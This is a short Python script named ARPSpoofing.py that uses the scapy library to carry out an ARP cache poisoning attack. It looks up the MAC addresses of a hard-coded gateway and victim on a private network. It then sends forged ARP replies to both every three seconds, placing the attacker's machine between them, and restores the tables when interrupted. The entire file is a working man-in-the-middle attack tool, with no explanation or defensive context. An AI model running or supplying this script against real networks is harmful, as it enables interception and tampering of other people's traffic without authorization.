ARPSpoofing.py
1.44 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
from time import sleep
from scapy.layers.inet import IP
from scapy.layers.l2 import Ether, ARP
from scapy.sendrecv import *
def getMAC(ip):
answered, unanswered=srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=5, retry=3)
for s, r in answered:
return r.sprintf('%Ether.src%')
def poisonARP(srcip, targetip, targetmac):
arp=ARP(op=2, psrc=srcip, pdst=targetip, hwdst=targetmac)
send(arp)
def restoreARP(victimip, gatewayip, victimmac, gatewaymac):
arp1=ARP(op=2, pdst=victimip, psrc=gatewayip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=gatewaymac)
arp2=ARP(op=2, pdst=gatewayip, psrc=victimip, hwdst='ff:ff:ff:ff:ff:ff', hwsrc=victimmac)
send(arp1,count=3)
send(arp2,count=3)
def main():
gatewayip='192.168.219.1'
victimip='192.168.219.102'
victimmac=getMAC(victimip)
gatewaymac=getMAC(gatewayip)
if victimmac == None or gatewaymac == None:
print('MAC 주소를 찾을 수 없습니다')
return
print('ARP spoofing Start -> VICTIM IP [%s]' %victimip)
print('[%s]:POISON ARP table [%s] -> [%s]' %(victimip,gatewaymac,victimmac))
try:
while True:
poisonARP(gatewayip,victimip,victimmac)
poisonARP(victimip,gatewayip,gatewaymac)
sleep(3)
except KeyboardInterrupt:
restoreARP(victimip,gatewayip,victimmac,gatewaymac)
print('ARP spoofing finished -> RESTORED ARP Table')
if __name__=='__main__':
main()